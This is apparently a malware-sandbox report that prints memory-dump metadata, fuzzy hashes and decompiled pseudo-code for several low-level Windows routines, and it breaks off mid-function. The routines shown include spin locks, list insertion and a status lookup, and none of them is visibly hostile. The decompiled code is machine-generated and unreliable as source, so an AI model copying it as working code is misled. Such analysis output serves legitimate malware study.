                                                                                            0x04cfdd12
                                                                                            0x04d43b08
                                                                                            0x04cfdd18
                                                                                            0x04cfdd18
                                                                                            0x04cfdd18
                                                                                            0x04cfdd20
                                                                                            0x04cfdd23
                                                                                            0x04d43b16
                                                                                            0x04d43b16
                                                                                            0x04cfdd29
                                                                                            0x04cfdd2d
                                                                                            0x04cfdd36
                                                                                            0x04cfdd40
                                                                                            0x04cfdd51
                                                                                            0x04cfdd51
                                                                                            0x04cfdc54
                                                                                            0x04cfdc59
                                                                                            0x04cfdc59
                                                                                            0x04cfdc5e
                                                                                            0x04cfdc5e
                                                                                            0x04cfdc63
                                                                                            0x04cfdc66
                                                                                            0x04cfdc6b
                                                                                            0x04cfdc78
                                                                                            0x04cfdc7b
                                                                                            0x04cfdc81
                                                                                            0x04cfdc81
                                                                                            0x04cfdc83
                                                                                            0x04cfdc89
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cfdd7b
                                                                                            0x04cfdd7b
                                                                                            0x04cfdc8f
                                                                                            0x04cfdc8f
                                                                                            0x04cfdc92
                                                                                            0x04cfdc99
                                                                                            0x04cfdc9f
                                                                                            0x04cfdca5
                                                                                            0x04cfdcaa
                                                                                            0x04cfdcaa
                                                                                            0x04cfdcb3
                                                                                            0x04cfdcb8
                                                                                            0x04cfdcbb
                                                                                            0x04cfdcc1
                                                                                            0x04cfdccf
                                                                                            0x04cfdcd2
                                                                                            0x04cfdcd5
                                                                                            0x04cfdcd7
                                                                                            0x04cfdcda
                                                                                            0x04cfdcdc
                                                                                            0x04cfdcdc
                                                                                            0x04cfdce2
                                                                                            0x04cfdce4
                                                                                            0x00000000
                                                                                            0x04cfdce4

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 47692547892b79dcad7aab26d5767b5c44794e933e1166cc200b727940df43ea
                                                                                            • Instruction ID: 45dfbd57e7e5a3c1f009c59cdc01024df195851d39e522cbce19bf9af7ac8274
                                                                                            • Opcode Fuzzy Hash: 47692547892b79dcad7aab26d5767b5c44794e933e1166cc200b727940df43ea
                                                                                            • Instruction Fuzzy Hash: 8451B271A01205DFCB54CF68C890A9EFBF2FB48314F25855ADA56A7344EB35BD44CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CEEF40, Relevance: .1, Instructions: 147COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 96%
                                                                                            			E04CEEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04CD9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04CD2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                                                            0x04ceef4b
                                                                                            0x04ceef4d
                                                                                            0x04ceef57
                                                                                            0x04cef0bd
                                                                                            0x04cef0c2
                                                                                            0x04cef0d2
                                                                                            0x04cef0d2
                                                                                            0x04cef0c2
                                                                                            0x04ceef5d
                                                                                            0x04ceef5f
                                                                                            0x04ceef67
                                                                                            0x04ceef6a
                                                                                            0x04ceef6d
                                                                                            0x04ceef74
                                                                                            0x04ceef7f
                                                                                            0x04ceef82
                                                                                            0x04ceef82
                                                                                            0x04ceef86
                                                                                            0x04ceef88
                                                                                            0x04ceef8c
                                                                                            0x04ceef8f
                                                                                            0x04ceef8f
                                                                                            0x04ceef8f
                                                                                            0x00000000
                                                                                            0x04ceef91
                                                                                            0x04ceef93
                                                                                            0x04ceefc4
                                                                                            0x04ceefc4
                                                                                            0x04ceefc4
                                                                                            0x04ceefca
                                                                                            0x04ceefd0
                                                                                            0x04cef0a6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cef0af
                                                                                            0x04d3bb06
                                                                                            0x04d3bb0a
                                                                                            0x04cef0b5
                                                                                            0x04cef0b5
                                                                                            0x04cef0b5
                                                                                            0x04cef0b5
                                                                                            0x00000000
                                                                                            0x04ceefd6
                                                                                            0x04ceefd9
                                                                                            0x04cef0de
                                                                                            0x04cef0e2
                                                                                            0x04ceefdf
                                                                                            0x04ceefdf
                                                                                            0x04ceefdf
                                                                                            0x04ceefe5
                                                                                            0x04d3bafc
                                                                                            0x04d3bafc
                                                                                            0x04ceefe5
                                                                                            0x04ceefeb
                                                                                            0x04ceefed
                                                                                            0x04cef00f
                                                                                            0x04cef011
                                                                                            0x04cef01a
                                                                                            0x04cef01d
                                                                                            0x04cef021
                                                                                            0x04cef028
                                                                                            0x04cef029
                                                                                            0x04cef029
                                                                                            0x04cef02c
                                                                                            0x00000000
                                                                                            0x04cef02c
                                                                                            0x04ceeff3
                                                                                            0x04ceeff9
                                                                                            0x04cef0ea
                                                                                            0x04cef0ed
                                                                                            0x04cef0ef
                                                                                            0x00000000
                                                                                            0x04cef0ef
                                                                                            0x04cef003
                                                                                            0x04d3bb12
                                                                                            0x04cef045
                                                                                            0x04cef049
                                                                                            0x04cef051
                                                                                            0x04cef09e
                                                                                            0x04cef0a0
                                                                                            0x04cef0a0
                                                                                            0x04cef09e
                                                                                            0x04cef053
                                                                                            0x04cef064
                                                                                            0x04cef064
                                                                                            0x04cef06b
                                                                                            0x04d3bb1a
                                                                                            0x04d3bb1a
                                                                                            0x04cef071
                                                                                            0x04cef071
                                                                                            0x04cef07d
                                                                                            0x04cef082
                                                                                            0x04cef08f
                                                                                            0x04cef08f
                                                                                            0x04cef009
                                                                                            0x04cef00d
                                                                                            0x00000000
                                                                                            0x04cef00d
                                                                                            0x04ceefd0
                                                                                            0x04ceef97
                                                                                            0x04ceefa5
                                                                                            0x04ceefaa
                                                                                            0x00000000
                                                                                            0x04ceefac
                                                                                            0x04ceefac
                                                                                            0x04ceefac
                                                                                            0x00000000
                                                                                            0x04ceefb2
                                                                                            0x04cef036
                                                                                            0x04cef03a
                                                                                            0x04cef040
                                                                                            0x04cef090
                                                                                            0x00000000
                                                                                            0x04cef092
                                                                                            0x04cef042
                                                                                            0x00000000
                                                                                            0x04cef042
                                                                                            0x04ceefb7
                                                                                            0x04ceefb9
                                                                                            0x04ceefbc
                                                                                            0x04ceefb0
                                                                                            0x04ceefb0
                                                                                            0x00000000
                                                                                            0x04ceefbe
                                                                                            0x04ceefbe
                                                                                            0x04ceefc1
                                                                                            0x00000000
                                                                                            0x04ceefc1
                                                                                            0x04ceefbc
                                                                                            0x04ceefaa
                                                                                            0x04ceef91

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                            • Instruction ID: 56c4caf0ff3a8d6b41f6ced67b51608623bfb177fb740f8fce0368e1c4a7361c
                                                                                            • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                            • Instruction Fuzzy Hash: 25510130A04249EFDB20CF6AC0C07BEBBB3AF45314F1881ADD54597282D376BA89D751
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04DA740D, Relevance: .1, Instructions: 141COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 84%
                                                                                            			E04DA740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E04D2D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E04D1F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L04CF4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L04CF4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E04D1F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L04CF4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                                                            0x04da740d
                                                                                            0x04da740d
                                                                                            0x04da7412
                                                                                            0x04da7413
                                                                                            0x04da7416
                                                                                            0x04da7418
                                                                                            0x04da741c
                                                                                            0x04da741f
                                                                                            0x04da7422
                                                                                            0x04da7422
                                                                                            0x04da7428
                                                                                            0x04da742a
                                                                                            0x04da742a
                                                                                            0x04da7451
                                                                                            0x04da7432
                                                                                            0x04da744f
                                                                                            0x04da744f
                                                                                            0x00000000
                                                                                            0x04da7434
                                                                                            0x04da7438
                                                                                            0x04da7443
                                                                                            0x04da7517
                                                                                            0x04da7517
                                                                                            0x04da751a
                                                                                            0x04da7535
                                                                                            0x04da7520
                                                                                            0x04da7527
                                                                                            0x04da752c
                                                                                            0x04da7531
                                                                                            0x04da7533
                                                                                            0x00000000
                                                                                            0x04da7533
                                                                                            0x00000000
                                                                                            0x04da7531
                                                                                            0x04da754b
                                                                                            0x04da754f
                                                                                            0x04da755c
                                                                                            0x04da755c
                                                                                            0x04da755f
                                                                                            0x04da7560
                                                                                            0x04da7561
                                                                                            0x04da7562
                                                                                            0x04da7563
                                                                                            0x04da7568
                                                                                            0x04da756a
                                                                                            0x04da756c
                                                                                            0x04da756d
                                                                                            0x04da756d
                                                                                            0x04da756f
                                                                                            0x04da7572
                                                                                            0x04da7574
                                                                                            0x04da7577
                                                                                            0x04da757c
                                                                                            0x04da757f
                                                                                            0x00000000
                                                                                            0x04da7551
                                                                                            0x04da7551
                                                                                            0x04da7551
                                                                                            0x04da7553
                                                                                            0x04da7553
                                                                                            0x04da7449
                                                                                            0x04da7449
                                                                                            0x04da744c
                                                                                            0x04da744c
                                                                                            0x00000000
                                                                                            0x04da744c
                                                                                            0x04da7443
                                                                                            0x04da750e
                                                                                            0x04da7514
                                                                                            0x04da7514
                                                                                            0x04da7455
                                                                                            0x04da7469
                                                                                            0x04da746d
                                                                                            0x00000000
                                                                                            0x04da7473
                                                                                            0x04da7473
                                                                                            0x04da7476
                                                                                            0x04da7480
                                                                                            0x04da7484
                                                                                            0x04da748e
                                                                                            0x04da7493
                                                                                            0x04da7493
                                                                                            0x04da7496
                                                                                            0x04da7499
                                                                                            0x04da74a1
                                                                                            0x04da74b1
                                                                                            0x04da74b5
                                                                                            0x00000000
                                                                                            0x04da74bb
                                                                                            0x04da74c1
                                                                                            0x04da74c1
                                                                                            0x04da74c4
                                                                                            0x04da74c5
                                                                                            0x04da74c6
                                                                                            0x04da74c7
                                                                                            0x04da74c8
                                                                                            0x04da74cd
                                                                                            0x00000000
                                                                                            0x04da74d3
                                                                                            0x04da74d3
                                                                                            0x04da74d6
                                                                                            0x04da74d8
                                                                                            0x04da74db
                                                                                            0x04da74dd
                                                                                            0x04da74e0
                                                                                            0x04da74e7
                                                                                            0x04da74ee
                                                                                            0x04da74ee
                                                                                            0x04da74f4
                                                                                            0x04da74f9
                                                                                            0x00000000
                                                                                            0x04da74fb
                                                                                            0x04da74fb
                                                                                            0x04da74fd
                                                                                            0x04da7500
                                                                                            0x04da7503
                                                                                            0x04da7505
                                                                                            0x04da7505
                                                                                            0x04da74f9
                                                                                            0x00000000
                                                                                            0x04da74cd
                                                                                            0x04da74b5
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                            • Instruction ID: 262b913eeb710ba3f2dce35ee85a1cd3d4c24385eac9fe85badbab6d98789f6c
                                                                                            • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                            • Instruction Fuzzy Hash: 46518C71600606EFDB15CF54C884A96BBB5FF45304F18C1AAE9089F262E371FA56CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D02990, Relevance: .1, Instructions: 133COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 97%
                                                                                            			E04D02990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x4daff00);
				E04D2D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x4cb1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E04D1E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x4cb1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E04D551BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x4cb166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E04D02AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E04CE6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E04D02C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E04CEEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E04D02AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E04D02C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E04D02ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E04D2D0D1(_t62);
				goto L28;
			}





















                                                                                            0x04d02990
                                                                                            0x04d02992
                                                                                            0x04d02997
                                                                                            0x04d029a3
                                                                                            0x04d029a6
                                                                                            0x04d029ab
                                                                                            0x04d029ad
                                                                                            0x04d029b2
                                                                                            0x04d45c80
                                                                                            0x04d029b8
                                                                                            0x04d029b8
                                                                                            0x04d029bb
                                                                                            0x04d029c0
                                                                                            0x04d029c5
                                                                                            0x04d029c6
                                                                                            0x04d029c6
                                                                                            0x04d029cb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d029cd
                                                                                            0x04d029d0
                                                                                            0x04d029d9
                                                                                            0x04d029db
                                                                                            0x04d029dd
                                                                                            0x04d02a7f
                                                                                            0x04d02a84
                                                                                            0x04d02a87
                                                                                            0x04d02a89
                                                                                            0x04d45ca1
                                                                                            0x04d45ca3
                                                                                            0x00000000
                                                                                            0x04d02a8f
                                                                                            0x04d02a8f
                                                                                            0x00000000
                                                                                            0x04d02a8f
                                                                                            0x00000000
                                                                                            0x04d029e3
                                                                                            0x04d029e3
                                                                                            0x04d029e3
                                                                                            0x00000000
                                                                                            0x04d029e3
                                                                                            0x04d029dd
                                                                                            0x00000000
                                                                                            0x04d029db
                                                                                            0x04d029e6
                                                                                            0x04d029e9
                                                                                            0x04d029eb
                                                                                            0x04d029ed
                                                                                            0x04d029f3
                                                                                            0x04d029f5
                                                                                            0x04d029f8
                                                                                            0x04d029fa
                                                                                            0x04d02a97
                                                                                            0x04d02a9a
                                                                                            0x04d02a9d
                                                                                            0x04d02add
                                                                                            0x00000000
                                                                                            0x04d02a9f
                                                                                            0x04d02aa2
                                                                                            0x04d02aa5
                                                                                            0x04d02aa8
                                                                                            0x04d02aab
                                                                                            0x04d45cab
                                                                                            0x04d45caf
                                                                                            0x04d45cc5
                                                                                            0x04d45cda
                                                                                            0x04d45cdc
                                                                                            0x04d45cdf
                                                                                            0x04d45ce5
                                                                                            0x00000000
                                                                                            0x04d45ceb
                                                                                            0x04d45ced
                                                                                            0x04d45cee
                                                                                            0x00000000
                                                                                            0x04d45cee
                                                                                            0x04d45cb1
                                                                                            0x04d45cb4
                                                                                            0x04d45cb9
                                                                                            0x04d45cbb
                                                                                            0x00000000
                                                                                            0x04d45cbd
                                                                                            0x04d45cbd
                                                                                            0x00000000
                                                                                            0x04d45cbd
                                                                                            0x04d45cbb
                                                                                            0x04d02ab1
                                                                                            0x04d02ab1
                                                                                            0x04d02ac4
                                                                                            0x04d02ac6
                                                                                            0x04d02ac6
                                                                                            0x00000000
                                                                                            0x04d02ac6
                                                                                            0x04d02aab
                                                                                            0x00000000
                                                                                            0x04d02a00
                                                                                            0x04d02a09
                                                                                            0x04d02a0e
                                                                                            0x04d02a21
                                                                                            0x04d02a24
                                                                                            0x04d02a35
                                                                                            0x04d02a3a
                                                                                            0x04d02a3d
                                                                                            0x04d02a42
                                                                                            0x04d02a59
                                                                                            0x04d02a59
                                                                                            0x04d02a5c
                                                                                            0x04d02a5f
                                                                                            0x04d02a5f
                                                                                            0x04d029fa
                                                                                            0x04d029f3
                                                                                            0x04d02a64
                                                                                            0x04d02a64
                                                                                            0x04d02a6b
                                                                                            0x04d02a6b
                                                                                            0x04d02a6d
                                                                                            0x04d02a72
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f908e721af8fd54817dffc20e6a61c245bd1ff31b53f7b610040fb616509c1c7
                                                                                            • Instruction ID: acfa29feec7b4e7a12c5a9453233454bb00ab094b50f09edb5a8ff827a27b8df
                                                                                            • Opcode Fuzzy Hash: f908e721af8fd54817dffc20e6a61c245bd1ff31b53f7b610040fb616509c1c7
                                                                                            • Instruction Fuzzy Hash: 0E515771A01219EFDF25CF55D884ADEBBB5FF48314F148095E904AB2A0D731ED52DBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D04D3B, Relevance: .1, Instructions: 131COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 78%
                                                                                            			E04D04D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
